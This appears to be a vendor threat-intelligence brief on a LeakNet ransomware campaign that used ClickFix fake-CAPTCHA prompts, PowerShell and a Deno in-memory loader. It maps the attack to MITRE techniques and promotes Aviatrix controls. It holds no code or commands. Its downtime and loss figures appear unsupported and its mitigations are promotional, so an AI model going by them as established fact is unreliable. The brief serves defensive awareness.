Executive Summary
In March 2026, the LeakNet ransomware group initiated a sophisticated campaign leveraging the ClickFix social engineering technique to gain initial access to target systems. By compromising legitimate websites, they presented users with deceptive prompts instructing them to execute malicious PowerShell commands under the guise of resolving non-existent errors. This method effectively bypassed traditional security measures, leading to the deployment of an in-memory loader utilizing the Deno JavaScript runtime. This loader facilitated the execution of the CastleRAT malware directly in memory, thereby evading detection by conventional endpoint security solutions. The campaign resulted in significant data breaches and operational disruptions across multiple sectors.
This incident underscores a concerning evolution in ransomware tactics, highlighting the increasing sophistication of social engineering methods and the exploitation of novel technologies like the Deno runtime for stealthy malware deployment. The use of in-memory execution techniques poses a substantial challenge to traditional security defenses, emphasizing the need for advanced detection mechanisms and comprehensive user education to mitigate such threats.
Why This Matters Now
The LeakNet ransomware campaign exemplifies the growing trend of threat actors employing advanced social engineering tactics and in-memory execution methods to evade detection. The exploitation of the Deno runtime for malware deployment represents a novel approach that traditional security tools may not effectively detect. This incident highlights the urgent need for organizations to enhance their security posture by adopting advanced behavioral detection systems and conducting regular user training to recognize and resist sophisticated phishing and social engineering attacks.
Attack Path Analysis
The LeakNet ransomware group initiated their attack by employing the ClickFix social engineering technique, tricking users into executing malicious commands via compromised websites. Upon gaining initial access, they escalated privileges to gain higher-level access within the system. They then moved laterally across the network to identify and access critical assets. Establishing command and control, they maintained persistent communication with compromised systems. Subsequently, they exfiltrated sensitive data before deploying ransomware to encrypt files, culminating in significant operational disruption.
Kill Chain Progression
Initial Compromise
Description
LeakNet utilized the ClickFix technique, presenting fake CAPTCHA verifications on compromised websites to deceive users into executing malicious commands.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste
Command and Scripting Interpreter: PowerShell
System Binary Proxy Execution: Mshta
Obfuscated Files or Information
Application Layer Protocol: DNS
Virtualization/Sandbox Evasion: System Checks
Obfuscated Files or Information: Steganography
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14(b)
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – Implement user training to recognize and resist social engineering attacks
Control ID: Identity Pillar: User Training
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Banking/Mortgage
LeakNet ransomware via ClickFix poses critical risks to financial institutions through compromised websites, threatening encrypted traffic, egress security, and regulatory compliance requirements.
Health Care / Life Sciences
Healthcare organizations face severe HIPAA compliance violations from LeakNet's social engineering tactics, potentially compromising patient data through lateral movement and exfiltration capabilities.
Information Technology/IT
IT sector highly vulnerable to LeakNet's Deno in-memory loader and ClickFix methods, requiring enhanced zero trust segmentation and multicloud visibility controls.
Government Administration
Government entities at risk from LeakNet's sophisticated attack vectors targeting public websites, necessitating strengthened threat detection and anomaly response systems.
Sources
- LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loaderhttps://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.htmlVerified
- ClickFix Attacks Surge 517% in 2025https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/Verified
- Think before you Click(Fix): Analyzing the ClickFix social engineering techniquehttps://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could likely limit the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-aware policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While Aviatrix CNSF primarily focuses on internal network security, its comprehensive visibility and monitoring capabilities could likely detect anomalous traffic patterns associated with the initial compromise.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation would likely limit the attacker's ability to escalate privileges by enforcing strict access controls and segmenting network resources based on identity and context.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security would likely restrict lateral movement by monitoring and controlling internal traffic flows, thereby limiting unauthorized access to critical assets.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control would likely detect and disrupt unauthorized command and control communications by providing comprehensive monitoring across multicloud environments.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement would likely prevent data exfiltration by enforcing strict egress policies and monitoring outbound traffic for anomalies.
While Aviatrix CNSF focuses on network security, its segmentation and access controls could likely limit the spread of ransomware, thereby reducing the overall impact on the organization.
Impact at a Glance
Affected Business Functions
- Data Management
- Customer Service
- Financial Transactions
Estimated downtime: 14 days
Estimated loss: $500,000
Potential exposure of sensitive customer data and financial records.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and limit attackers' ability to access critical assets.
- • Enhance East-West Traffic Security to monitor and control internal network communications, detecting unauthorized movements.
- • Deploy Egress Security & Policy Enforcement to prevent unauthorized data exfiltration and block communication with malicious external servers.
- • Utilize Threat Detection & Anomaly Response systems to identify and respond to unusual activities indicative of compromise.
- • Educate users on social engineering tactics like ClickFix to reduce the risk of initial compromise through deceptive prompts.
